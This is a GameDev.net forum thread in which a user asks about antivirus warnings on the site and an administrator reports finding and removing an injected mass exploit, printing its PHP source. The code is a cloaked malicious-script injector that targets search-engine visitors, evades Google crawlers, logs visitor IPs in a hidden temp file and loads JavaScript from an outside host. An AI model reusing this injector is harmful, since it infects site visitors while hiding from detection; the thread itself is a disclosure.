🎉 Celebrating 25 Years of GameDev.net! 🎉

Not many can claim 25 years on the Internet! Join us in celebrating this milestone. Learn more about our history, and thank you for being a part of our community!

Back to GDNet Comments, Suggestions, and Ideas

Virus

debo adeola · 2015-02-17T04:29:09

Hello, (i know mods will relocate this) This question is definitely not for here... but it doesn't fit anywhere else. This reoccurs once in a while and initially I ignored (as with the last few times), but this time i thought i should ask anyway. Occasionally, Avast detects virus when i'm on this website. I suppose the system here scans imported files So is Avast playing tricks on me (or misinterpreting scripts) and i should continue to ignore the warning? Does anyone else get virus warning on here?

GDNet Comments, Suggestions, and Ideas Community

Started by welOhim February 13, 2015 01:16 AM

10 comments, last by Michael Tanczos 9 years, 4 months ago

jbadams

26,386

February 15, 2015 09:23 AM

Thanks for the additional information! :)

- Jason Astle-Adams

Michael Tanczos

5,681

February 17, 2015 04:29 AM

I disabled every ad network we use.. I'm looking for anything else unusual but I'm not seeing anything yet.

UPDATE: Found something.. might have been from a forum exploit. It's removed for now.

UPDATE2: Awesome.. looks like some type of mass exploit.. here was the code:

[source]

function kmhNNPH($p) {

$m = false;

$file_d = '/tmp/._tmpURtDPCgF';

$ip_l = (string)ip2long($p);

if(file_exists($file_d) and @is_writable($file_d) and (($size_f = @filesize($file_d)) > 0)) {

$data = file_get_contents($file_d);

$data .= "$ip_l,";

if(substr_count($data,"$ip_l,") <= 1) $m = true;

if($size_f > 1000000) $data = "$ip_l,";

file_put_contents($file_d,$data);

return $m;

} else return true;

}

function VrUJjeJd($p) {

$sec = 'oTkdDkELRzXFvisX';

$key = substr(sha1($_SERVER['HTTP_USER_AGENT'].$p.$sec),0,mt_rand(15,39));

$key = explode("\n",chunk_split($key,(strlen($key)/mt_rand(2,8)),"\n"));

$b = implode('',array_merge(range('G','Z'),range('g','z'))).'___';

$g = array();

foreach($key as $str) {

if($str == '') continue;

$n = '';

for($i = 0;$i<=strlen($str)-1;$i++) {

$n.= ((mt_rand(1,2) == 1) ? $b[mt_rand(0,42)] : '').$str[$i].((mt_rand(1,2) == 1) ? $b[mt_rand(0,42)] : '');

}

$g[] = substr(str_shuffle(implode('',array_merge(range('A','Z'),range('a','z'),range('0','9'))).'____'),0,mt_rand(3,6)).'='.$n;

}

$url = '/?'.implode('&',$g);

return "\r\n<script type=\"text/javascript\" src=\"http://luissiania.com$url\"></script>";

}

function BFaYmrYG() {

$ip = '';

if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {

$arr = explode(',',$_SERVER['HTTP_X_FORWARDED_FOR']);

if(preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/',$arr['0'])) {

$ip = $arr['0'];

}

return (!empty($ip)) ? $ip : @getenv('REMOTE_ADDR');

}

function GLadUzoz() {

if(preg_match('#google|msn|live|altavista|ask|yahoo|aol|bing|exalead|excite|lycos|myspace|alexa|doubleclick#i',$_SERVER['HTTP_REFERER'])) {

if(preg_match('#msie|firefox|opera|chrome|Trident#i',$_SERVER['HTTP_USER_AGENT'])) return true;

}

function PSGAeiAkX($p) {

$a = array('216.239.','209.85.','173.255.','173.194.','89.207.','74.125.','72.14.','66.249.','66.102.','64.233.');

foreach($a as $b) {

if(preg_match("/^$b/i",$p)) return true;

}

function xbNcmYEJ() {

if(!empty($_SERVER['HTTP_REFERER']) and !empty($_SERVER['HTTP_ACCEPT']) and !empty($_SERVER['HTTP_ACCEPT_LANGUAGE'])) {

if(GLadUzoz() and ($p = BFaYmrYG()) and !PSGAeiAkX($p) and kmhNNPH($p)) return VrUJjeJd($p);

}

return '';

}

return @xbNcmYEJ();

[/source]

🎉 Celebrating 25 Years of GameDev.net! 🎉

Virus

This topic is closed to new replies.

Popular Topics

Recommended Tutorials

🎉 Celebrating 25 Years of GameDev.net! 🎉

Virus

This topic is closed to new replies.

Popular Topics

Recommended Tutorials

Reticulating splines